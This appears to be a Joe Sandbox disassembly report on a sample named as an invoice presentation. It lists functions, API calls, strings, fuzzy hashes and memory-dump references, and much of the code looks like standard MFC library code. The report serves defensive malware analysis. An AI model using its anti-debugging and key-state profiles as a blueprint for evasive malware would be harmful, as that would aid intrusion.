Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Virtual$AllocInfoProtectQuerySystem
String ID:
API String ID: 3562403962-0
Opcode ID: 5db32966ed66bfa4e83ffee0e764fe1a609855c65b05b5cdd0ddb6a6b8d60fae
Instruction ID: 367465e2354dc8cbd815bee0c7abf7ef71fd0adb298c5aa50d1c979df66845bd
Opcode Fuzzy Hash: 5db32966ed66bfa4e83ffee0e764fe1a609855c65b05b5cdd0ddb6a6b8d60fae
Instruction Fuzzy Hash: 2A219572E00258ABCB20DBA58C85EEFBBB8EB44751F094525ED05E7241E630D904CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 00D5A5D4, Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D5A5E0
IsDebuggerPresent.KERNEL32 ref: 00D5A6AC
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D5A6CC
UnhandledExceptionFilter.KERNEL32(?), ref: 00D5A6D6

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: e0e7a1c95080889ea164cfb67d38a8d11dc97a7eb0be50103b64cf9c5d33e19b
Instruction ID: 4fc14b2a2073f0b3d2f290c8b289f0547a38db8a3ddf1bbb3c206fc904f53aec
Opcode Fuzzy Hash: e0e7a1c95080889ea164cfb67d38a8d11dc97a7eb0be50103b64cf9c5d33e19b
Instruction Fuzzy Hash: BB312875D05318DFDF20DFA4D9897CDBBB8AF08305F10419AE809A7250EB705A898F65

Uniqueness

Uniqueness Score: -1.00%

Function 00BBA38E, Relevance: 6.0, APIs: 4, Instructions: 38keyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BBE901: GetWindowLongA.USER32 ref: 00BBE90E

GetKeyState.USER32(00000010), ref: 00BBA3AB
GetKeyState.USER32(00000011), ref: 00BBA3B8
GetKeyState.USER32(00000012), ref: 00BBA3C5
SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 00BBA3DF

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: 397184ebb2c6b02c8ed52bd037149c32a39dd1a196d5489a749e8dc894dac10f
Instruction ID: 8737e3a1c9f777fa60ac810e3c1f0069f031b5712f9ac0fac4007d8ab906103f
Opcode Fuzzy Hash: 397184ebb2c6b02c8ed52bd037149c32a39dd1a196d5489a749e8dc894dac10f
Instruction Fuzzy Hash: A1F0BE39F40355D7EE603B24AC55FF92AE0AF50B97F004AA5B643EB1D1CEE088018536

Uniqueness

Uniqueness Score: -1.00%

Function 00D680C8, Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00D681C0
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D681CA
UnhandledExceptionFilter.KERNEL32(?), ref: 00D681D7

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 85404dcba5e788757d9bdbe7065f3cfe671554b53a8bbe15d643776c1bafd651
Instruction ID: 16058b1bc90ab5302dd9c87592698e39b004198791601757e73beed823c8a162
Opcode Fuzzy Hash: 85404dcba5e788757d9bdbe7065f3cfe671554b53a8bbe15d643776c1bafd651
Instruction Fuzzy Hash: 1D31C6749113289BCB61DF28D98978DBBF4BF08310F5042DAE80CA7251EB309B858F55

Uniqueness

Uniqueness Score: -1.00%

Function 00BBAA7C, Relevance: 3.4, APIs: 2, Instructions: 403COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BBAA86

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: 7e4b2fda3161886f84e62cf910e818aa3400b8b9bfd883b14b36aed79c27653d
Instruction ID: b14a477869d0c82538eff6ea6c733e52b9183a937b9124ed31a291e8b8a7f902
Opcode Fuzzy Hash: 7e4b2fda3161886f84e62cf910e818aa3400b8b9bfd883b14b36aed79c27653d
Instruction Fuzzy Hash: FBE15C70A00219DFDF24DF64C884AFE7BE6EF48310F1440A9E815AB291DBB5ED41CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00C00C4D, Relevance: 3.0, APIs: 2, Instructions: 38comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00BAF910
CoCreateInstance.OLE32(00DFD5E0,00000000,00000001,00DC49CC,?), ref: 00BAF932

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: CreateInitializeInstance
String ID:
API String ID: 3519745914-0
Opcode ID: f2c1fa7e4cf8cf622e5e4b1425c5cc86580426f793d7957ab961db9283f5fc77
Instruction ID: 667a2e65d3ae2a23755a1831283174d0014fe01b5e46a3c9efb7d76251a3814e
Opcode Fuzzy Hash: f2c1fa7e4cf8cf622e5e4b1425c5cc86580426f793d7957ab961db9283f5fc77
Instruction Fuzzy Hash: B7F04971209303EFEB209BA58884BF3B7EAEB82759F0045BEE546D2201D7B0D845DB21

Uniqueness

Uniqueness Score: -1.00%

Function 00BE6783, Relevance: 3.0, APIs: 2, Instructions: 36windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00BE6795
IsIconic.USER32 ref: 00BE67A7

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: IconicVisibleWindow
String ID:
API String ID: 1797901696-0
Opcode ID: 2d871b46ff306e8bfa3ebe89e4d83d12e6407308ed5182ac9f54aee875093ce2
Instruction ID: 60cc485fb6b6c5f3b75d9e2d7fb4dbdc3608ab8660f6797e4ebf00ba280f812b
Opcode Fuzzy Hash: 2d871b46ff306e8bfa3ebe89e4d83d12e6407308ed5182ac9f54aee875093ce2
Instruction Fuzzy Hash: 15F0E232311060A78D14273B9C845FEB7DEAFA53B87040366ED20E31E0DB608C5152E0

Uniqueness

Uniqueness Score: -1.00%

Function 00BC23F6, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 28memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00BC2407

Strings

$b, xrefs: 00BC2434

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: HeapProcess
String ID: $b
API String ID: 54951025-394242954
Opcode ID: ae39de344988880f4fbb4caf2c5da2df3331578e8d04df7100f20c4d10365d54
Instruction ID: ae9942e9c3f7069b8c1b521adac06cacd2521106d6d6986fc1fcf9d315136115
Opcode Fuzzy Hash: ae39de344988880f4fbb4caf2c5da2df3331578e8d04df7100f20c4d10365d54
Instruction Fuzzy Hash: 07F08235A58311DFCB109B66B849A813BE0E703325714109DE849A7360D7F0684B8BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00D5A3F4, Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00D5A40A

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 741d012d993a9f617c84c78223ac819cdb718f1eef7c3e1652970ccfa6f12d31
Instruction ID: 2275c5a2f1bf536bf3e72d40d75934977ac6696e502f41c25b1e98d31d342a4d
Opcode Fuzzy Hash: 741d012d993a9f617c84c78223ac819cdb718f1eef7c3e1652970ccfa6f12d31
Instruction Fuzzy Hash: 6D517D72D046198FDB14CF9AD9956AABBF0FB44311F18852AC805FB261E3B8DD09CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00D9085C, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4d1a1f23723c8d32b38ca8f2b7cb27712f6a504f22dbc08c30d04d83467e898
Instruction ID: 680594824a9f267a35bcee56d5124b8b46bfc6fb919c42fe5aa6cd1cc92e1eae
Opcode Fuzzy Hash: a4d1a1f23723c8d32b38ca8f2b7cb27712f6a504f22dbc08c30d04d83467e898
Instruction Fuzzy Hash: C6E0EC72A1127CEBCB29EB98D94498AF7FCEB45B50B5544A6B911D3111C270DF01C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 00BAEC9B, Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 189stringCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BAECA2
lstrcmpA.KERNEL32(?,00DC47E4,00000008,00BAEC77,?,?,?,?,?,00000004), ref: 00BAECB2
lstrcmpA.KERNEL32(?,00DC47E8,?,?,?,00000004), ref: 00BAECCE

Strings

UnregisterPerUser, xrefs: 00BAED90
RegserverPerUser, xrefs: 00BAED3C
Automation, xrefs: 00BAEE9B
UnregserverPerUser, xrefs: 00BAEDAC
RestartByRestartManager, xrefs: 00BAEDC9
Regserver, xrefs: 00BAED04
dde, xrefs: 00BAEE50
RegisterPerUser, xrefs: 00BAED20
Unregister, xrefs: 00BAED58
Register, xrefs: 00BAECE8
ddenoshow, xrefs: 00BAEE2E
Embedding, xrefs: 00BAEE70
Unregserver, xrefs: 00BAED74

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: lstrcmp$H_prolog3
String ID: Automation$Embedding$Register$RegisterPerUser$Regserver$RegserverPerUser$RestartByRestartManager$Unregister$UnregisterPerUser$Unregserver$UnregserverPerUser$dde$ddenoshow
API String ID: 477540313-844245956
Opcode ID: 645f3051183bc7ceb42b2f87a6a79d6b784066c1f6a260d5a92bc9977da78de9
Instruction ID: 3511f6b222a8cbf62ac5e48dbf6124afc76b71cbc502359790a24f6afed23c04
Opcode Fuzzy Hash: 645f3051183bc7ceb42b2f87a6a79d6b784066c1f6a260d5a92bc9977da78de9
Instruction Fuzzy Hash: 3B517270698349FEEB606F60CE9DF7B3AACEB52B08F00056CB165A71D1D6B4D848C631

Uniqueness

Uniqueness Score: -1.00%

Function 00BB4EC2, Relevance: 45.9, APIs: 25, Strings: 1, Instructions: 427windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BB4ECC

Part of subcall function 00BA39F5: __EH_prolog3.LIBCMT ref: 00BA39FC
Part of subcall function 00BA39F5: _strlen.LIBCMT ref: 00BA3A37

GetMenuItemInfoA.USER32 ref: 00BB4F44
GetMenuItemInfoA.USER32 ref: 00BB4F77
CopyRect.USER32 ref: 00BB4F9E
GetObjectA.GDI32(?,00000018,?), ref: 00BB4FCB
GetSystemMetrics.USER32 ref: 00BB4FE8
GetSystemMetrics.USER32 ref: 00BB4FF3
GetSysColor.USER32(00000004), ref: 00BB5031
CreateCompatibleDC.GDI32(00000000), ref: 00BB504B
CopyRect.USER32 ref: 00BB509F
GetSysColor.USER32(0000000D), ref: 00BB50B0
GetSysColor.USER32(00000010), ref: 00BB50D0
GetSysColor.USER32(00000014), ref: 00BB50DA
GetSysColor.USER32(0000000D), ref: 00BB5110
GetSysColor.USER32(00000007), ref: 00BB5287
ExtTextOutA.GDI32(00000001,?,?,00000002,00000000,?,?,00000000), ref: 00BB52CC
CreateCompatibleDC.GDI32(00000000), ref: 00BB5331
InflateRect.USER32(00000000,000000FF,000000FF), ref: 00BB535A
BitBlt.GDI32(00000003,00000000,?,?,?,?,00000000,00000000,Function_00130020), ref: 00BB5379

Strings

@, xrefs: 00BB4F31

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Color$Rect$CompatibleCopyCreateInfoItemMenuMetricsSystem$H_prolog3H_prolog3_InflateObjectText_strlen
String ID: @
API String ID: 805137892-2766056989
Opcode ID: 8036ce118510a2e570238fd9a1ec1160d866ba8f7a5181017ccbde04c246b661
Instruction ID: da5d898aade158d34da4c281487b8f4d64964f83f2caca0884552de184df09bb
Opcode Fuzzy Hash: 8036ce118510a2e570238fd9a1ec1160d866ba8f7a5181017ccbde04c246b661
Instruction Fuzzy Hash: E1F12875A00618DFDF14DFA8CC89BEDBBB5FF48300F144259E906AB291CBB4A945CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B91D58, Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 42registrywindowCOMMON

Download Yara Rule

APIs

RegisterWindowMessageA.USER32(Native), ref: 00D56B2E
RegisterWindowMessageA.USER32(OwnerLink), ref: 00D56B3B
RegisterWindowMessageA.USER32(ObjectLink), ref: 00D56B49
RegisterWindowMessageA.USER32(Embedded Object), ref: 00D56B57
RegisterWindowMessageA.USER32(Embed Source), ref: 00D56B65
RegisterWindowMessageA.USER32(Link Source), ref: 00D56B73
RegisterWindowMessageA.USER32(Object Descriptor), ref: 00D56B81
RegisterWindowMessageA.USER32(Link Source Descriptor), ref: 00D56B8F
RegisterWindowMessageA.USER32(FileName), ref: 00D56B9D
RegisterWindowMessageA.USER32(FileNameW), ref: 00D56BAB
RegisterWindowMessageA.USER32(Rich Text Format), ref: 00D56BB9
RegisterWindowMessageA.USER32(RichEdit Text and Objects), ref: 00D56BC7

Strings

Link Source, xrefs: 00D56B6B
RichEdit Text and Objects, xrefs: 00D56BBF
Native, xrefs: 00D56B27
Link Source Descriptor, xrefs: 00D56B87
Embed Source, xrefs: 00D56B5D
OwnerLink, xrefs: 00D56B34
FileName, xrefs: 00D56B95
Object Descriptor, xrefs: 00D56B79
FileNameW, xrefs: 00D56BA3
Embedded Object, xrefs: 00D56B4F
ObjectLink, xrefs: 00D56B41
Rich Text Format, xrefs: 00D56BB1

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: MessageRegisterWindow
String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
API String ID: 1814269913-2889995556
Opcode ID: 73172b05383ea3cdbee0a6c1aa5b24e89407337e1942a30c700ef901513442c0
Instruction ID: 35d2f1d14e2d60af6dc670a178620edc7d7e056280f9d6bd553da6890446cc38
Opcode Fuzzy Hash: 73172b05383ea3cdbee0a6c1aa5b24e89407337e1942a30c700ef901513442c0
Instruction Fuzzy Hash: 09117571941B44DFCB20DFB5EE0D4597BB8BA097013428A19B346EBA54D6749108CF73

Uniqueness

Uniqueness Score: -1.00%

Function 00BB0836, Relevance: 33.7, APIs: 8, Strings: 11, Instructions: 488registryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BB086C
RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00000008,?), ref: 00BB0971
RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 00BB098E
RegCloseKey.ADVAPI32(?), ref: 00BB09AF

Strings

%Ts\shell\print\%Ts, xrefs: 00BD4C5D, 00BD4CB9
ddeexec, xrefs: 00BD4C34, 00BD4C3C, 00BD4C56, 00BD4C73
command, xrefs: 00BD4C90, 00BD4C98, 00BD4CB2, 00BD4CCF
Software\, xrefs: 00BB08D9
%Ts\ShellNew, xrefs: 00BD4D64
%Ts\shell\printto\%Ts, xrefs: 00BD4C7A, 00BD4CD6
\{8895b1c6-b41f-4c1c-a562-0d564250836f}, xrefs: 00BD4D94, 00BD4D99, 00BD4DA6
p, xrefs: 00BA362D
%Ts\DefaultIcon, xrefs: 00BD4BFA
%Ts\ShellEx, xrefs: 00BD4D89, 00BD4DBA
%Ts\shell\open\%Ts, xrefs: 00BD4C40, 00BD4C9C

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: CloseEnumH_prolog3_Open
String ID: %Ts\DefaultIcon$%Ts\ShellEx$%Ts\ShellNew$%Ts\shell\open\%Ts$%Ts\shell\print\%Ts$%Ts\shell\printto\%Ts$Software\$\{8895b1c6-b41f-4c1c-a562-0d564250836f}$command$ddeexec$p
API String ID: 3581956906-2579286660
Opcode ID: 8c33e9732b58abf423896e80121c02100467c7631f69144085f1338ddb8400f9
Instruction ID: f9aef2ae8bc3a99ecd97d0cb19a98f639a698cec45c70e8e26e30c2dba483f0f
Opcode Fuzzy Hash: 8c33e9732b58abf423896e80121c02100467c7631f69144085f1338ddb8400f9
Instruction Fuzzy Hash: 5B02697190021AEFCF14EBA4CD85EFEBBB9EF05314F0400A9E515A7291EB75AA45CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00BBC6CA, Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 182COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BBC6D4

Part of subcall function 00BC2B6D: __EH_prolog3.LIBCMT ref: 00BC2B74

CallNextHookEx.USER32(?,?,?,?), ref: 00BBC70C
GetClassLongA.USER32 ref: 00BBC761
GlobalGetAtomNameA.KERNEL32 ref: 00BBC791
CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,ime,000000FF), ref: 00BBC7A8
SetWindowLongA.USER32 ref: 00BBC813
CallNextHookEx.USER32(?,00000003,?,?), ref: 00BBC921
UnhookWindowsHookEx.USER32(?), ref: 00BBC935

Strings

#32768, xrefs: 00BBC861, 00BBC867, 00BBC89E
AfxOldWndProc423, xrefs: 00BBC8CF, 00BBC8E0, 00BBC8EC, 00BBC8FC
ime, xrefs: 00BBC79C

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Hook$CallLongNext$AtomClassCompareGlobalH_prolog3H_prolog3_NameStringUnhookWindowWindows
String ID: #32768$AfxOldWndProc423$ime
API String ID: 762668124-4034971020
Opcode ID: a6d9b34ee9b20a721596610f81311529f9fa5fbe44721921337b81f1a6b85cc7
Instruction ID: 62f3d7575facfa18655a6180ce5a73e3017f79b4051ecf39fd6339ca70346afe
Opcode Fuzzy Hash: a6d9b34ee9b20a721596610f81311529f9fa5fbe44721921337b81f1a6b85cc7
Instruction Fuzzy Hash: 9F617135500225EBEB219B14DC59BFE3FB4EF59721F1002D8F945A72A1DBB09D81CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C04794, Relevance: 33.2, APIs: 22, Instructions: 217windowmemoryCOMMON

Download Yara Rule

APIs

GetStockObject.GDI32(0000000F), ref: 00C047A9
GetObjectA.GDI32(?,00000018,?), ref: 00C047BC
CreateCompatibleDC.GDI32(00000000), ref: 00C0480D
CreateBitmap.GDI32(00000001,00000001,00000001,?,00000000), ref: 00C04829
SelectObject.GDI32(00000000,00000000), ref: 00C0483C
SelectPalette.GDI32(00000000,?,00000000), ref: 00C0484D
RealizePalette.GDI32(00000000), ref: 00C04857
GlobalAlloc.KERNEL32(00000000,?,?,00000000), ref: 00C04860
